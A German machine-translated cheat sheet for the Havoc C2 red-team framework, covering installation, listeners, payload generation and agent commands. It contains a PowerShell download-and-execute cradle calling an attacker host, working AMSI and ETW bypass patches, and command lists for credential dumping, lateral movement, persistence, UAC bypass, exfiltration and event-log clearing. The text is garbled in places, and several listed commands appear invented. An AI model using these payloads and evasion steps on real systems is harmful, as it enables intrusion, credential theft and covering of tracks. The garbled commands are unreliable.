Havoc C2 Framework Cheat Sheet¶
Überblick¶
Havoc ist ein modernes, mißbräuchliches Kommando- und Steuerungskonzept (C2) für rote Teamoperationen mit Fokus auf Betriebssicherheit und Evasion. Mit einer modularen Architektur gebaut, bietet Havoc erweiterte Nachbenutzungsfunktionen, unterstützt mehrere Kommunikationsprotokolle und bietet umfangreiche Anpassungsmöglichkeiten für anspruchsvolle Gegneremulation.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install dependencies (Ubuntu/Debian)¶
sudo apt update sudo apt install -y build-essential cmake pkg-config libssl-dev libpq-dev python3-dev python3-pip golang-go
Install Qt5 development libraries¶
sudo apt install -y qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools
Install Python dependencies¶
pip3 install --user PyQt5 requests ```_
Aufbau von Source¶
```bash
Clone Havoc repository¶
git clone https://github.com/HavocFramework/Havoc.git cd Havoc
Build teamserver¶
cd teamserver go mod download make
Build client¶
cd ../client make
Verify build¶
ls -la bin/ ```_
Docker Installation¶
```bash
Clone repository¶
git clone https://github.com/HavocFramework/Havoc.git cd Havoc
Build Docker image¶
docker build -t havoc-teamserver -f teamserver/Dockerfile .
Run teamserver container¶
docker run -d --name havoc-ts -p 40056:40056 -p 443:443 -p 80:80 havoc-teamserver
Build client Docker image¶
docker build -t havoc-client -f client/Dockerfile .
Run client container¶
docker run -it --name havoc-client -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix havoc-client ```_
Kali Linux Installation¶
```bash
Install from Kali repositories (if available)¶
sudo apt update sudo apt install havoc-c2
Or build from source¶
git clone https://github.com/HavocFramework/Havoc.git cd Havoc sudo apt install -y build-essential cmake pkg-config libssl-dev qtbase5-dev cd teamserver && make cd ../client && make ```_
Konfiguration¶
Teamserver Setup¶
```yaml
teamserver/profiles/havoc.yaotl¶
Teamserver: Host: "0.0.0.0" Port: 40056
Build: Compiler64: "/usr/bin/x86_64-w64-mingw32-gcc" Compiler86: "/usr/bin/i686-w64-mingw32-gcc" Nasm: "/usr/bin/nasm"
# SSL Configuration Certs: Cert: "data/x509-server.crt" Key: "data/x509-server.key"
Operators: - Name: "admin" Password: "password123"
- Name: "operator1" Password: "redteam2024"
Listeners: - Name: "HTTP Listener" Protocol: "Http" Host: "192.168.1.100" Port: 80
- Name: "HTTPS Listener" Protocol: "Https" Host: "secure.example.com" Port: 443 Cert: "data/cert.pem" Key: "data/key.pem" ```_
SSL Zertifikat Generation¶
```bash
Generate self-signed certificate¶
openssl req -new -x509 -keyout data/x509-server.key -out data/x509-server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=havoc-server"
Generate certificate for HTTPS listener¶
openssl req -new -x509 -keyout data/cert.pem -out data/cert.pem -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
Set proper permissions¶
chmod 600 data/.key data/.pem ```_
Malleable C2 Profil¶
```c
profiles/amazon.profile¶
set sample_name "Amazon";
set sleeptime "30000"; set jitter "20"; set maxdns "255"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36";
http-get \\{ set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
client \\\\{
header "Host" "www.amazon.com";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "Connection" "keep-alive";
metadata \\\\{
base64url;
parameter "field-keywords";
\\\\}
\\\\}
server \\\\{
header "Server" "Server";
header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVqZmduZXJlaGZ0b2VoZmQ=";
output \\\\{
netbios;
prepend "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">";
prepend "<html><head><title>Amazon.com: Online Shopping for Electronics, Apparel, Computers, Books, DVDs & more</title>";
append "</html>";
print;
\\\\}
\\\\}
\\}
http-post \\{ set uri "/N4215/adj/amzn.us.sr.aps";
client \\\\{
header "Host" "www.amazon.com";
header "Accept" "*/*";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "Content-Type" "text/xml";
header "Connection" "keep-alive";
id \\\\{
base64url;
parameter "sz";
\\\\}
output \\\\{
base64url;
parameter "tile";
\\\\}
\\\\}
server \\\\{
header "Server" "Server";
output \\\\{
netbios;
prepend "0";
append "";
print;
\\\\}
\\\\}
\\} ```_
Basisnutzung¶
Teamserver starten¶
```bash
Start teamserver with default profile¶
cd teamserver ./teamserver -profile profiles/havoc.yaotl
Start with custom profile¶
./teamserver -profile profiles/custom.yaotl
Start with debug mode¶
./teamserver -profile profiles/havoc.yaotl -debug
Start with specific bind address¶
./teamserver -profile profiles/havoc.yaotl -bind 0.0.0.0:40056 ```_
Client-Verbindung¶
```bash
Start Havoc client¶
cd client ./Havoc
Connect to teamserver¶
- Enter teamserver details:
- Host: 192.168.1.100
- Port: 40056
- Username: admin
-
Password: password123
-
Click Connect ```_
Web Interface¶
```bash
Access web interface (if enabled)¶
https://192.168.1.100:40056/web
Default credentials¶
Username: admin Password: password123 ```_
Hörer Management¶
HTTP Listener¶
```bash
Create HTTP listener via GUI¶
- Navigate to Listeners tab
- Click "Add Listener"
- Configure parameters:
- Name: HTTP-80
- Protocol: HTTP
- Host: 192.168.1.100
- Port: 80
- User Agent: Mozilla/5.0...
- Headers: Custom headers
Via configuration file¶
Listeners: - Name: "HTTP Listener" Protocol: "Http" Host: "192.168.1.100" Port: 80 UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" Headers: - "Accept: text/html,application/xhtml+xml" - "Accept-Language: en-US,en;q=0.9" ```_
HTTPS Hörer¶
```bash
Create HTTPS listener¶
- Navigate to Listeners tab
- Click "Add Listener"
- Configure parameters:
- Name: HTTPS-443
- Protocol: HTTPS
- Host: secure.example.com
- Port: 443
- Certificate: /path/to/cert.pem
- Private Key: /path/to/key.pem
- User Agent: Custom UA string
Advanced HTTPS configuration¶
Listeners: - Name: "HTTPS Listener" Protocol: "Https" Host: "secure.example.com" Port: 443 Cert: "certs/server.crt" Key: "certs/server.key" UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" Secure: true HSTS: true ```_
BMB Hörer¶
```bash
Create SMB listener for lateral movement¶
- Navigate to Listeners tab
- Click "Add Listener"
- Configure parameters:
- Name: SMB-445
- Protocol: SMB
- Named Pipe: \.\pipe\msagent_##
- Host: 192.168.1.100
- Port: 445
SMB configuration¶
Listeners: - Name: "SMB Listener" Protocol: "Smb" PipeName: "msagent_ab" Host: "192.168.1.100" Port: 445 ```_
Nutzlasterzeugung¶
Demon Agent (Windows)¶
```bash
Generate Demon payload via GUI¶
- Navigate to Payloads tab
- Click "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTP-80
- Architecture: x64
- Format: Windows Executable
- Indirect Syscalls: Enabled
- Sleep Obfuscation: Enabled
Advanced Demon configuration¶
Payload: Agent: "Demon" Listener: "HTTP-80" Arch: "x64" Format: "Windows Executable" Config: Sleep: 5 Jitter: 20 IndirectSyscalls: true SleepObfuscation: true ProxyLoading: true AmsiBypass: true EtwBypass: true ```_
Shellcode Generation¶
```bash
Generate shellcode¶
- Navigate to Payloads tab
- Select "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTPS-443
- Format: Shellcode (bin)
- Architecture: x64
- Obfuscation: Enabled
Use generated shellcode¶
Inject into process¶
Use with custom loaders¶
Integrate with other frameworks¶
```_
PowerShell Payload¶
```powershell
Generate PowerShell payload¶
- Navigate to Payloads tab
- Select "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTP-80
- Format: PowerShell
- Obfuscation: Enabled
Generated PowerShell example¶
\(s='192.168.1.100';\)p=80;\(u='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'; \(wc=New-Object System.Net.WebClient;\)wc.Headers.Add('User-Agent',\)u); \(wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;\)wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials; \(k=\)wc.DownloadData("http://\(s:\)p/");IEX([System.Text.Encoding]::ASCII.GetString($k));
Execute on target¶
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')" ```_
DLL Payload¶
```bash
Generate DLL payload¶
- Navigate to Payloads tab
- Select "Generate Payload"
- Configure parameters:
- Agent: Demon
- Listener: HTTPS-443
- Format: Windows DLL
- Architecture: x64
- Export Function: DllMain
Load DLL on target¶
rundll32.exe payload.dll,DllMain
Or via PowerShell¶
```_
Personalmanagement¶
Demon Agent Commands¶
```bash
Basic system information¶
whoami # Current user context hostname # Computer name pwd # Current directory ls # List directory contents cd [path] # Change directory cat [file] # Read file contents ps # List processes env # Environment variables
File operations¶
download [file] # Download file from target upload [local] [remote] # Upload file to target mkdir [directory] # Create directory rm [file] # Remove file cp [source] [dest] # Copy file mv [source] [dest] # Move file ```_
Prozessmanagement¶
```bash
Process operations¶
ps # List all processes ps -u [user] # List processes by user kill [pid] # Terminate process killall [name] # Kill processes by name
Process injection¶
inject [pid] [shellcode] # Inject shellcode into process hollowing [target] [payload] # Process hollowing doppelganging [target] [payload] # Process doppelganging
Token manipulation¶
steal_token [pid] # Steal process token make_token [user] [pass] [domain] # Create new token rev2self # Revert to original token ```_
Einrichtende Operationen¶
```bash
Credential harvesting¶
mimikatz [command] # Execute Mimikatz commands logonpasswords # Dump logon passwords lsadump # Dump LSA secrets sam # Dump SAM database cache # Dump cached credentials
Kerberos attacks¶
kerberoast # Kerberoasting attack asreproast # AS-REP roasting dcsync [user] # DCSync attack golden [options] # Golden ticket creation silver [options] # Silver ticket creation ```_
Spätere Bewegung¶
```bash
Remote execution¶
psexec [target] [command] # PSExec execution wmiexec [target] [command] # WMI execution smbexec [target] [command] # SMB execution winrm [target] [command] # WinRM execution
Credential-based movement¶
pth [hash] [target] [command] # Pass-the-hash ptk [ticket] [target] [command] # Pass-the-ticket
Service manipulation¶
sc [target] create [service] [binary] # Create service sc [target] start [service] # Start service sc [target] stop [service] # Stop service sc [target] delete [service] # Delete service ```_
Erweiterte Funktionen¶
SOCKEN Proxy¶
```bash
Start SOCKS proxy¶
socks start [port] # Start SOCKS⅘ proxy on port socks list # List active SOCKS proxies socks stop [id] # Stop SOCKS proxy
Use with external tools¶
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24 proxychains firefox proxychains msfconsole ```_
Port Forwarding¶
```bash
Local port forwarding¶
portfwd add [local_port] [remote_host] [remote_port] portfwd list # List active port forwards portfwd remove [id] # Remove port forward
Reverse port forwarding¶
rportfwd add [remote_port] [local_host] [local_port] rportfwd list # List reverse port forwards rportfwd remove [id] # Remove reverse port forward ```_
Persistenzmechanismen¶
```bash
Registry persistence¶
persist registry [key] [value] [payload] # Registry autorun persist startup [name] [payload] # Startup folder persist service [name] [payload] # Windows service
Scheduled task persistence¶
persist schtask [name] [trigger] [payload] # Scheduled task persist wmi [filter] [consumer] [payload] # WMI event subscription
Advanced persistence¶
persist com [clsid] [payload] # COM hijacking persist dll [target] [payload] # DLL hijacking ```_
Vorrechte Eskalation¶
```bash
UAC bypass techniques¶
uacbypass [method] [payload] # Various UAC bypass methods eventvwr [payload] # Event Viewer UAC bypass fodhelper [payload] # FodHelper UAC bypass computerdefaults [payload] # Computer Defaults UAC bypass
Kernel exploits¶
exploit ms16-032 [payload] # Secondary Logon Handle EoP exploit ms16-135 [payload] # Windows Kernel-Mode Drivers EoP exploit cve-2021-1675 [payload] # PrintNightmare ```_
Daten Exfiltration¶
```bash
File exfiltration¶
exfil http [file] [url] # HTTP exfiltration exfil dns [file] [domain] # DNS exfiltration exfil smb [file] [share] # SMB exfiltration
Database exfiltration¶
exfil sql [connection] [query] # SQL database exfiltration exfil ldap [server] [query] # LDAP exfiltration
Steganography¶
exfil stego [file] [image] # Hide data in image exfil stego [file] [audio] # Hide data in audio ```_
Evasion Techniken¶
AMSI Bypass¶
```csharp // AMSI bypass implementation in Demon public static void BypassAMSI() \\{ try \\{ var amsiDll = LoadLibrary("amsi.dll"); var amsiScanBuffer = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBuffer, patch.Length);
VirtualProtect(amsiScanBuffer, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch (Exception ex)
\\\\{
// Handle exception
\\\\}
\\} ```_
ETW Bypass¶
```csharp // ETW bypass implementation public static void BypassETW() \\{ try \\{ var ntdll = LoadLibrary("ntdll.dll"); var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch (Exception ex)
\\\\{
// Handle exception
\\\\}
\\} ```_
Schlafstörung¶
```c // Sleep obfuscation in Demon agent void SleepObfuscation(DWORD dwMilliseconds) \\{ CONTEXT ctx = \\{ 0 \\}; HANDLE hTimer = NULL; LARGE_INTEGER liDueTime = \\{ 0 \\};
// Create waitable timer
hTimer = CreateWaitableTimer(NULL, TRUE, NULL);
if (!hTimer) return;
// Set timer
liDueTime.QuadPart = -10000LL * dwMilliseconds;
SetWaitableTimer(hTimer, &liDueTime, 0, NULL, NULL, FALSE);
// Encrypt agent in memory
EncryptAgent();
// Wait for timer
WaitForSingleObject(hTimer, INFINITE);
// Decrypt agent
DecryptAgent();
CloseHandle(hTimer);
\\} ```_
Indirekte Syscalls¶
```asm ; Indirect syscall implementation .code
IndirectSyscall PROC mov r10, rcx mov eax, edx jmp qword ptr [r8] IndirectSyscall ENDP
; Usage in C NTSTATUS IndirectNtAllocateVirtualMemory( HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect ) \\{ return IndirectSyscall(ProcessHandle, 0x18, SyscallAddress); \\} ```_
Automatisierung und Schrift¶
Python Automation¶
```python
Havoc automation script¶
import requests import json import time
class HavocAPI: def init(self, host, port, username, password): self.base_url = f"https://\\{host\\}:\\{port\\}/api" self.session = requests.Session() self.session.verify = False self.authenticate(username, password)
def authenticate(self, username, password):
auth_data = \\\\{
"username": username,
"password": password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json()["token"]
self.session.headers.update(\\\\{"Authorization": f"Bearer \\\\{self.token\\\\}"\\\\})
def get_demons(self):
response = self.session.get(f"\\\\{self.base_url\\\\}/demons")
return response.json()
def execute_command(self, demon_id, command):
task_data = \\\\{
"demon_id": demon_id,
"command": command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/tasks", json=task_data)
return response.json()
def automated_recon(self, demon_id):
"""Automated reconnaissance on new demon"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"netstat -an",
"ipconfig /all",
"systeminfo"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(demon_id, cmd)
time.sleep(2)
# Credential harvesting if elevated
if self.is_elevated(demon_id):
self.execute_command(demon_id, "mimikatz logonpasswords")
Usage¶
havoc = HavocAPI("192.168.1.100", 40056, "admin", "password123") demons = havoc.get_demons()
for demon in demons: if demon["status"] == "active": havoc.automated_recon(demon["id"]) ```_
PowerShell Automation¶
```powershell
PowerShell automation for Havoc¶
function Invoke-HavocAutomation \\{ param( [string]\(HavocServer = "192.168.1.100", [int]\)Port = 40056, [string]\(Username = "admin", [string]\)Password = "password123" )
# Authenticate to Havoc API
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
$authResponse = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/auth" -Method POST -Body $authData -ContentType "application/json" -SkipCertificateCheck
$token = $authResponse.token
$headers = @\\\\{
"Authorization" = "Bearer $token"
"Content-Type" = "application/json"
\\\\}
# Get active demons
$demons = Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/demons" -Headers $headers -SkipCertificateCheck
foreach ($demon in $demons) \\\\{
if ($demon.status -eq "active") \\\\{
Write-Host "[+] Processing demon: $($demon.id)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "ps", "netstat -an")
foreach ($cmd in $commands) \\\\{
$taskData = @\\\\{
demon_id = $demon.id
command = $cmd
\\\\}|ConvertTo-Json
Invoke-RestMethod -Uri "https://$HavocServer:$Port/api/tasks" -Method POST -Body $taskData -Headers $headers -SkipCertificateCheck
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\}
Execute automation¶
Invoke-HavocAutomation ```_
Bash Automation¶
```bash
!/bin/bash¶
Havoc automation script¶
HAVOC_SERVER="192.168.1.100" HAVOC_PORT="40056" USERNAME="admin" PASSWORD="password123"
Authenticate and get token¶
TOKEN=\((curl -s -k -X POST "https://\)HAVOC_SERVER:\(HAVOC_PORT/api/auth" \ -H "Content-Type: application/json" \ -d "\\\\{\"username\":\"\)USERNAME\",\"password\":\"$PASSWORD\"\\}"|\ jq -r '.token')
Function to execute command on demon¶
execute_command() \\{ local demon_id=\(1 local command=\)2
curl -s -k -X POST "https://$HAVOC_SERVER:$HAVOC_PORT/api/tasks" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"demon_id\":\"$demon_id\",\"command\":\"$command\"\\\\}"
\\}
Get active demons¶
DEMONS=\((curl -s -k -H "Authorization: Bearer \(TOKEN" \ "https://\)HAVOC_SERVER:\)HAVOC_PORT/api/demons"|\ jq -r '.[]|select(.status=="active")|.id')
Execute commands on each demon¶
for demon_id in $DEMONS; do echo "[+] Processing demon: $demon_id"
# Reconnaissance commands
commands=("whoami" "hostname" "ps" "netstat -an" "ipconfig")
for cmd in "$\\\\{commands[@]\\\\}"; do
echo "[+] Executing: $cmd"
execute_command "$demon_id" "$cmd"
sleep 2
done
done ```_
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Use Havoc with Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Havoc demon¶
upload meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload¶
shell C:\Windows\Temp\update.exe
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Cobalt Strike Integration¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use Havoc for initial access, pivot to Beacon¶
From Havoc demon¶
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```_
BlutHound Integration¶
```bash
Collect BloodHound data via Havoc¶
Upload SharpHound to target¶
upload SharpHound.exe C:\Windows\Temp\collector.exe
Run BloodHound collection¶
shell C:\Windows\Temp\collector.exe -c All -d domain.local
Download collected data¶
download C:\Windows\Temp*BloodHound.zip
Import into BloodHound¶
neo4j start ./BloodHound --no-sandbox ```_
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Domain fronting configuration¶
Configure CDN (CloudFlare, AWS CloudFront)¶
Set up domain fronting rules¶
Update listener configuration¶
Certificate management¶
Use legitimate SSL certificates¶
Implement certificate pinning¶
Regular certificate rotation¶
```_
Verkehrsobfukation¶
```bash
Malleable C2 profiles¶
Mimic legitimate applications¶
Use realistic timing and jitter¶
Implement traffic shaping¶
Custom user agents¶
Match target environment¶
Use legitimate application signatures¶
Implement user agent rotation¶
```_
Anti-Forensik¶
```bash
Event log clearing¶
shell wevtutil cl System shell wevtutil cl Security shell wevtutil cl Application
Timestomping¶
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Memory cleanup¶
Implement secure memory wiping¶
Use process migration¶
Clear command history¶
```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Demon not connecting¶
- Check firewall rules
- Verify listener configuration
- Test network connectivity
- Check antivirus interference
SSL certificate issues¶
Regenerate certificates¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Performance issues¶
Increase demon sleep time¶
Optimize task execution¶
Use multiple listeners¶
```_
Debug Mode¶
```bash
Enable debug logging¶
./teamserver -profile profiles/havoc.yaotl -debug
Check logs¶
tail -f logs/teamserver.log
Network troubleshooting¶
Use Wireshark to analyze traffic¶
Check for network filtering¶
Verify DNS resolution¶
```_
Datenbankprobleme¶
```bash
Reset database¶
rm -rf data/havoc.db ./teamserver -profile profiles/havoc.yaotl
Backup database¶
cp data/havoc.db data/havoc.db.backup
Restore database¶
cp data/havoc.db.backup data/havoc.db ```_
Best Practices¶
Betriebsplanung¶
- ** Voreinstellung**: Profile und Zuhörer vor dem Eingriff konfigurieren
- Teamkoordination: Bedienermanagement für Teamkooperation nutzen
- ** Kommunikationsprotokolle*: klare C2-Kommunikationskanäle einrichten
- Datenhandling: Implementierung sicherer Datenerfassung und Exfiltration
- **Cleanup-Verfahren*: Plan zur Artefaktentfernung und Betriebsreinigung
Sicherheitsüberlegungen¶
```bash
Secure deployment¶
Use strong authentication¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Agent management¶
Use unique agent configurations¶
Implement kill dates¶
Regular agent rotation¶
Secure communication channels¶
```_
Dokumentation und Reporting¶
```bash
Operation documentation¶
Maintain detailed logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```_
Ressourcen¶
- [Havoc GitHub Repository](LINK_5
- Dokumentation
- [Havoc Community Discord](LINK_5__
- [Red Team Village Havoc Training](LINK_5__
- (SANS Red Team Operations)(LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Havoc C2 Rahmen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *